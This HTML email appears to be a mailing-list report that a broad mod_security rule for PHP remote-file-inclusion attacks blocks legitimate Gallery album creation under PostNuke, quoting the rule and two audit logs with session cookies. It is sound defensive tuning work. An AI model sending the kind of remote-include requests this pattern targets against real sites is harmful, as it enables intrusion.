<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
pre
{margin:0in;
margin-bottom:.0001pt;
font-size:10.0pt;
font-family:"Courier New";}
span.EmailStyle17
{font-family:Verdana;
color:black;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>This rule:</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>#really broad
furl_fopen attack sig</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>#tune this for your
system</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>SecFilterSelective
REQUEST_URI
"!(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main)"
chain</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>SecFilterSelective
REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Causes a false
positive when a Gallery user tries to create a new album. At least for those
that have Gallery imbedded into PostNuke which two of the domains on my server
do.</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Here’s two audit
entries from two different users:</span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<pre><font size=2 face="Courier New"><span style='font-size:10.0pt'>==a3a30c72==============================</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Request: www.DOMAINA.com <IP ADDRESS> - - [10/Jun/2006:20:28:25 --0500] "GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1402 "http://www.DOMAINA.com/nuke/html/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" wAp60UIczXUAAFyP0c8AAAAM "-"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>----------------------------------------</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>GET /nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2Fnuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Referer: http://www.DOMAINA.com/nuke/html/modules/gallery/</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Language: en-us</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Encoding: gzip, deflate</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Host: www.DOMAINA.com</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: Keep-Alive</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Cookie: POSTNUKESID=f4a0458a85a5ff7cc62c85510811469f; POSTNUKESID=aec2dac49a491e304beaa804257b632d; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3BN%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; gallery_session_add_photos_mode=form; phpbb2mysql_sid=5c52ed124857e5d615753e6bd65d0421; phpbb2mysql_t=a%3A3%3A%7Bi%3A1057%3Bi%3A1149827453%3Bi%3A114%3Bi%3A1149861963%3Bi%3A1058%3Bi%3A1149862021%3B%7D; PHPSESSID=aa50a71cddfcc06039a7a5d6dfe368c4; testing=1; sid=8c8eb42eadfcdc742030e34513a7e951</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-action: 500</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'> </span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>HTTP/1.1 500 Internal Server Error</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Last-Modified: Tue, 06 Sep 2005 04:00:25 GMT</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>ETag: "134043-57a-77bb0840"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Ranges: bytes</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Length: 1402</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: close</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Type: text/html</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>--a3a30c72--</span></font></pre>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
<pre><font size=2 face="Courier New"><span style='font-size:10.0pt'>==c164ef16==============================</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Request: morrowind.DOMAINB.com <IP ADDRESS> - - [10/Jun/2006:20:23:27 --0500] "GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1408 "http://morrowind.DOMAINB.com/modules/gallery/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" rkLfukIczXUAAAY8gMAAAAAI "-"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>----------------------------------------</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>GET /modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept: */*</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Referer: http://morrowind.DOMAINB.com/modules/gallery/</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Language: en-us</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Encoding: gzip, deflate</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Host: morrowind.DOMAINB.com</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: Keep-Alive</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Cookie: pnphpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D; POSTNUKESID=df57897f8dcbe1c40eb870d8789843c5; PHPSESSID=34c42d9461125024a0929be9e98201a1</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-action: 500</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>mod_security-message: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'> </span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>HTTP/1.1 500 Internal Server Error</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Last-Modified: Tue, 06 Sep 2005 04:01:49 GMT</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>ETag: "db401f-580-7cbcc540"</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Accept-Ranges: bytes</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Length: 1408</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Connection: close</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>Content-Type: text/html</span></font></pre><pre><font
size=2 face="Courier New"><span style='font-size:10.0pt'>--c164ef16--</span></font></pre>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'> </span></font></p>
</div>
</body>
</html>